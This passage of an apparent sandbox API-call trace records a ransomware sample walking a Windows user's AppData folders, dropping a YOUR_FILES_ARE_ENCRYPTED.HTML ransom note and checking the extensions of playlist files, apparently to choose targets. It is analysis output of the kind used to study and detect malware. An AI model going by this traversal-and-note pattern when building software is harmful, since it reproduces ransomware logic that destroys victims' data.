ftLastWriteTime.dwLowDateTime=0x8e8c0c7b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="VersionManager", cAlternateFileName="VERSIO~1")) returned 0 [0111.216] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0111.216] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0111.216] GetProcessHeap () returned 0x600000 [0111.216] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.216] WriteFile (in: hFile=0x320, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.217] CloseHandle (hObject=0x320) returned 1 [0111.218] GetProcessHeap () returned 0x600000 [0111.218] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.218] GetProcessHeap () returned 0x600000 [0111.218] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0111.219] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0111.219] StrStrIW (lpFirst="Media Player", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.219] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player") returned 62 [0111.219] GetProcessHeap () returned 0x600000 [0111.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0111.220] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player" [0111.220] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\*" [0111.220] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x760d4d6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.221] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x760d4d6f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.221] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Sync Playlists", cAlternateFileName="SYNCPL~1")) returned 1 [0111.221] StrStrIW (lpFirst="Sync Playlists", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.221] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned 77 [0111.221] GetProcessHeap () returned 0x600000 [0111.221] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.221] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists" [0111.221] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*" [0111.221] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x626878 [0111.223] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0111.223] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="en-US", cAlternateFileName="")) returned 1 [0111.223] StrStrIW (lpFirst="en-US", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.223] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 83 [0111.223] GetProcessHeap () returned 0x600000 [0111.223] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0111.224] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0111.224] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*" [0111.224] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.224] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0111.225] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fe83ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fe83ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="00007F03", cAlternateFileName="")) returned 1 [0111.225] StrStrIW (lpFirst="00007F03", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.225] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03") returned 92 [0111.225] GetProcessHeap () returned 0x600000 [0111.225] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0111.225] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03" [0111.225] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\*" [0111.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fe83ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fe83ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName=".", cAlternateFileName="")) returned 0x626638 [0111.231] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fe83ee, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fe83ee, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="..", cAlternateFileName="")) returned 1 [0111.231] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="01_Music_auto_rated_at_5_stars.wpl", cAlternateFileName="01_MUS~1.WPL")) returned 1 [0111.231] StrStrIW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.231] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\01_Music_auto_rated_at_5_stars.wpl") returned 127 [0111.231] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0111.232] lstrlenW (lpString=".wpl") returned 4 [0111.232] PathFindExtensionW (pszPath="01_Music_auto_rated_at_5_stars.wpl") returned=".wpl" [0111.232] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="02_Music_added_in_the_last_month.wpl", cAlternateFileName="02_MUS~1.WPL")) returned 1 [0111.232] StrStrIW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.232] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\02_Music_added_in_the_last_month.wpl") returned 129 [0111.232] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0111.232] lstrlenW (lpString=".wpl") returned 4 [0111.232] PathFindExtensionW (pszPath="02_Music_added_in_the_last_month.wpl") returned=".wpl" [0111.232] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fc20df, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="03_Music_rated_at_4_or_5_stars.wpl", cAlternateFileName="03_MUS~1.WPL")) returned 1 [0111.232] StrStrIW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.232] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\03_Music_rated_at_4_or_5_stars.wpl") returned 127 [0111.232] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0111.232] lstrlenW (lpString=".wpl") returned 4 [0111.232] PathFindExtensionW (pszPath="03_Music_rated_at_4_or_5_stars.wpl") returned=".wpl" [0111.232] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fc20df, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fc20df, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fc20df, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="04_Music_played_in_the_last_month.wpl", cAlternateFileName="04_MUS~1.WPL")) returned 1 [0111.232] StrStrIW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.232] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\04_Music_played_in_the_last_month.wpl") returned 130 [0111.232] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0111.232] lstrlenW (lpString=".wpl") returned 4 [0111.232] PathFindExtensionW (pszPath="04_Music_played_in_the_last_month.wpl") returned=".wpl" [0111.232] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fc20df, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fc20df, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fc20df, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="05_Pictures_taken_in_the_last_month.wpl", cAlternateFileName="05_PIC~1.WPL")) returned 1 [0111.232] StrStrIW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.232] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\05_Pictures_taken_in_the_last_month.wpl") returned 132 [0111.232] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0111.232] lstrlenW (lpString=".wpl") returned 4 [0111.232] PathFindExtensionW (pszPath="05_Pictures_taken_in_the_last_month.wpl") returned=".wpl" [0111.232] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fc20df, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fc20df, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fc20df, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x311, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="06_Pictures_rated_4_or_5_stars.wpl", cAlternateFileName="06_PIC~1.WPL")) returned 1 [0111.232] StrStrIW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.232] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\06_Pictures_rated_4_or_5_stars.wpl") returned 127 [0111.232] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0111.232] lstrlenW (lpString=".wpl") returned 4 [0111.232] PathFindExtensionW (pszPath="06_Pictures_rated_4_or_5_stars.wpl") returned=".wpl" [0111.232] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fc20df, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fc20df, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fc20df, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="07_TV_recorded_in_the_last_week.wpl", cAlternateFileName="07_TV_~1.WPL")) returned 1 [0111.232] StrStrIW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.233] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\07_TV_recorded_in_the_last_week.wpl") returned 128 [0111.233] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0111.233] lstrlenW (lpString=".wpl") returned 4 [0111.233] PathFindExtensionW (pszPath="07_TV_recorded_in_the_last_week.wpl") returned=".wpl" [0111.233] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fc20df, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fc20df, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fc20df, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="08_Video_rated_at_4_or_5_stars.wpl", cAlternateFileName="08_VID~1.WPL")) returned 1 [0111.233] StrStrIW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.233] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\08_Video_rated_at_4_or_5_stars.wpl") returned 127 [0111.233] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0111.233] lstrlenW (lpString=".wpl") returned 4 [0111.233] PathFindExtensionW (pszPath="08_Video_rated_at_4_or_5_stars.wpl") returned=".wpl" [0111.233] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fc20df, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fc20df, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fc20df, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x401, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="09_Music_played_the_most.wpl", cAlternateFileName="09_MUS~1.WPL")) returned 1 [0111.233] StrStrIW (lpFirst="09_Music_played_the_most.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.233] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\09_Music_played_the_most.wpl") returned 121 [0111.233] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0111.233] lstrlenW (lpString=".wpl") returned 4 [0111.233] PathFindExtensionW (pszPath="09_Music_played_the_most.wpl") returned=".wpl" [0111.233] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fc20df, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fc20df, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40fc20df, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x427, dwReserved0=0x3188130, dwReserved1=0x3188088, cFileName="10_All_Music.wpl", cAlternateFileName="10_ALL~1.WPL")) returned 1 [0111.233] StrStrIW (lpFirst="10_All_Music.wpl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.233] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00007F03\\10_All_Music.wpl") returned 109 [0111.233] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0111.233] lstrlenW (lpString=".wpl") returned 4 [0111.233] PathFindExtensionW (pszPath="10_All_Music.wpl") returned=".wpl" [0111.233] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40fc20df, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40fc20df, 